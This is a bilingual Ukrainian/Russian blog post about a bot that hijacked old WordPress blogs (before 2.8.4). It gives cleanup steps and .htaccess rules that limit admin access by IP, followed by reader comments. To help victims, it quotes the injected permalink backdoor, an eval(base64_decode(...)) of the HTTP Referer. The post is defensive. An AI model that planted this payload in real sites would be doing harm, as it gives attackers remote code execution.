06
Вчора пройшла хвиля атаки і взлому блогів на вордпресі. А якщо погуглити, то можемо зробити висновок, що пострадали тисячі сайтів.
Так в чому полягала суть? А суть в тому, що дехто запустив в мережу бота, що виявляв старі версії Wordpress (до версії 2.8.4) і користуючись старим багом, реєстрував юзера і використовуючи певних шаблон посилання отримував адмінські права, потім під цим юзером міняв шаблон ЧПУ в налаштуваннях, а далі модифікував (заражав) код теми, щоб підсовувати відвідувачам вірус чи ще якусь фігню.
І хоч мій блог досі працює на одній із старих версій вордпресу, але його ця напасть минувала. А все тому, що бот визначав версію блога по мета-тегу, що автоматом прописує вордпрес в усі теми, а я цей тег давним давно в себе видалив. Про те, як видалити цей тег, я писав раніше в статті: корисні функції в functions.php — раджу і вам таке зробити ;)
А тим, хто вже пострадав від цього віруса, черв'яка, бота (називайте як хочете) потрібно зробити:
- В налаштуваннях ЧПУ, поміняти з
/%postname%/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
на
/%postname%/
(у вас може відрізнятись структура, по аналогії я думаю зрозумієте :)) - Найдіть останнього зареєстрованого користувача на вашому сайті і знищіть його! Швидше за все, це буде MikeWink E-mail: bugbeemershonyhe@gmail.com
- Оновити Wordpress до версії 2.8.4
Але якщо немає бажання оновлюватись і хочете покращити безпеку свого блогу, ви можете заборонити всім доступ до адмінки окрім себе, за допомогою невеличкої правки .htaccess
Звичайно, було б добре коли у вас постійний статичний IP-адрес, тоді тільки б його і вказали. А якщо у вас динамічна айпішка, то можете вказати діапазон
Для цього зробіть наступне:
- зайдіть на сайт myip.ru аби дізнатись ваш IP адрес (способів дізнатись зовнішній айпі дуже багато, я привів самий простий для блондинок). Ви наприклад побачили: ВАШ IP-АДРЕС: 91.134.98.173
- створіть файл .htaccess в папці wp-admin вашого блогу і пропишіть там наступне:
AuthUserFile /dev/null AuthGroupFile /dev/null AuthName "Access Control" AuthType Basic <LIMIT GET> order deny,allow deny from all allow from 91.134.98.173 </LIMIT>а якщо у вас динамічна айпішка, то краще напишіть так:
Детальніше про синтаксис директив Allow, Deny для Apache htaccess читайте тут.AuthUserFile /dev/null AuthGroupFile /dev/null AuthName "Access Control" AuthType Basic <LIMIT GET> order deny,allow deny from all allow from 91.134.0.0/255.255.0.0 </LIMIT> - Збережіть файл. Все.
Тепер, до адмінки вашого блогу зможете потрапити лише ви з вашого комп'ютера. А якщо ви будете в дорозі, або в інтернет-кафе і захочете, зайти в адмінку блога, а вас не буде пускати (швидше за все, ви побачите помилку 404), бо айпішка не входить у вказаний діапазон, то тоді вам потрібно буде зайти по фтп на хостинг і тимчасово переіменувати файл .htaccess. І тут мабудь хтось з вас подумав: «Це що, я ще й маю пароль на фтп пам'ятати для таких випадків?» — Ну а що ви хотіли, прийдеться жертувати зручністю заради безпеки. Це як у відомій цитаті: «Так вам шашечки или ехать?!»
Бережіть себе і бережіть свій блог.
Вчера прошла волна атаки и взлома блогов на вордпрессе. И если погуглить, то можно судить, что пострадали тысячи блогов.
Но как все это произошло? А случилось вот что: кое-кто запустил в сеть бота, который находил старые версии Wordpress (до версии 2.8.4) и пользуясь старым багом, регистрировал юзера и используя определенную ссылку получал права админа на блоге, потом под этим юзером менял шаблон ЧПУ в настройках, а далее модифицировал (заражал) код темы.
И хотя мой блог до сих пор работает на одной из старых версий вордпресса, но не пострадал. А все потому, что бот определял версию блога по мета-тегу, который автоматически прописывает вордпресс во все темы, а я этот тег давным-давно у себя удалил. Про то, как удалить этот тег, я писал ранее в статье: корисні функції в functions.php — советую и вам так же сделать ;)
А тем, кто уже пострадал от этого вируса, червья, бота (называйте как хотите) нужно:
- В настройках ЧПУ, поменять с
/%postname%/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
на
/%postname%/
(у вас может отличаться структура, по аналогии думаю поймете, что где поменять :)) - Найдите последнего зарегистрированного пользователя на вашем сайте и уничтожьте его! Скорее всего , это будет MikeWink E-mail: bugbeemershonyhe@gmail.com
- Обновите Wordpress до версии 2.8.4
А если нет желания обновляться и хотите улучшить безопасность своего блога, то вы можете запретить всем доступ к админке, кроме себя, с помощю небольшой правки .htaccess
Конечно, было бы лучше, если у вас постоянный статический IP-адрес, тогда тольки бы его и указывали. Но в случае динамического айпи-адреса можете указывать диапазон адресов.
Для это сделайте следующее:
- зайдите на сайт myip.ru чтобы узнать ваш IP адрес. К примеру: ВАШ IP-АДРЕС: 91.134.98.173
- создайте файл .htaccess в папке wp-admin вашего блога и пропишите там следующее:
AuthUserFile /dev/null AuthGroupFile /dev/null AuthName "Access Control" AuthType Basic <LIMIT GET> order deny,allow deny from all allow from 91.134.98.173 </LIMIT>в случае динамического IP-адреса, напишите так:
Подробнее о синтаксисе директив Allow, Deny для Apache htaccess читайте здесь.AuthUserFile /dev/null AuthGroupFile /dev/null AuthName "Access Control" AuthType Basic <LIMIT GET> order deny,allow deny from all allow from 91.134.0.0/255.255.0.0 </LIMIT> - Сохраните файл. Все.
Теперь, к админке вашего блога зайти можете только вы с вашого компьютера. Ну а если вы будете в дороге, или в интернет-кафе и захотите, зайти в админку блога, а вас не будет пускать (скорей всего, вы увидите сообщение об ошибке 404), потому что IP-адрес не входит в указанный диапазон, то тогда вам нужно будет зайти по фтп на хостинг и временно переименовать файл .htaccess. И тут, наверное, кто-то из вас подумал: «Это я еще должен и пароль на фтп помнить для таких случаев?» — Ну а что вы хотели, приходится жертвовать удобством ради безопасности. Помните цитату: «Так вам шашечки или ехать?!»
Берегите себя и берегите свой блог.
![[Post to Twitter]](http://lilumi.org.ua/wp-content/plugins/tweet-this/icons/tt-twitter-micro4.png "Взломали ваш блог на Вордпресі. Не знаєте що робити? Тоді читайте!"){kind=icon}
Але якщо на сайті немає реєстрації користувачів і є лише один користувач , то ця проблема не є актуальна.
ти знаєш, на рахунок цього, я не впевнений :) Можливо той бот реєструється в обхід звичайної системи реєстрації, користуючись якимось багом вордпресу.
щось дуже сумніавюся. перевірив на двох блогах. там по одному зареєстрованому адміну і все.
Можу погодитися з думкою ELECTRIC'а, що в даному випадку ламають сайти, де є дозволена реєстрація користувачів. З власного досвіду: з 4-х моїх блогів на ВП інфіковано лише той, де є дозволена реєстрація.
судячи з коментарів у Лекактуса: — навіть при закритій реєстрації бот умудряється реєструватись
Я обмежив доступ по ір, у мене постійна адреса.
До речі, у мене всюди заборонене реєстрація. а також немає показу номеру версії. І всі сайто-блоґи цілі.
правильно робиш
Практика показує, що взламати можна все. рекомендую частіше робити бекапи, бо якщо блог стане популярним, то ламатимуть його однозначно... таке життя
Мій блоґ ніби на місці. Слава Богу!
Дякую за статтю! Але вже переконався на практиці, що бекапи — надзвичайно потрібна річ!!!